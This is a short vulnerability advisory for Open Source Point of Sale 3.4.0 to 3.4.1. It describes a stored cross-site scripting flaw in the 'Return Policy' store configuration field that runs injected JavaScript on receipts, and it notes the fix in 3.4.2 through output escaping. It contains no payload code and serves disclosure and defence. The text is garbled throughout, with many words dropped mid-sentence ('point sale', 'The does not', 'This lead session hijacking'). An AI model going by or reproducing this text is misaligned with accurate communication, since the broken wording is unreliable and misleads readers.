Open Source Point of Sale (opensourcepos) is a web based point sale application written in PHP using CodeIgniter framework. Starting version 3.4.0 and prior to 3.4.2, Stored Cross-Site Scripting (XSS) vulnerability exists the "Return Policy" configuration field. The does not properly sanitize user input before saving it database or displaying on receipts. An attacker with access "Store Configuration" (such as rogue administrator an account compromised via separate CSRF vulnerability) can inject malicious JavaScript payloads into this These are executed browser any (including other administrators sales staff) whenever they view receipt complete transaction. This lead session hijacking, theft sensitive data, unauthorized actions performed behalf victim. has been patched 3.4.2 by ensuring output escaped `esc()` function template. As temporary mitigation, should ensure field contains only plain text strictly avoid entering HTML tags. There no code-based workaround than applying patch.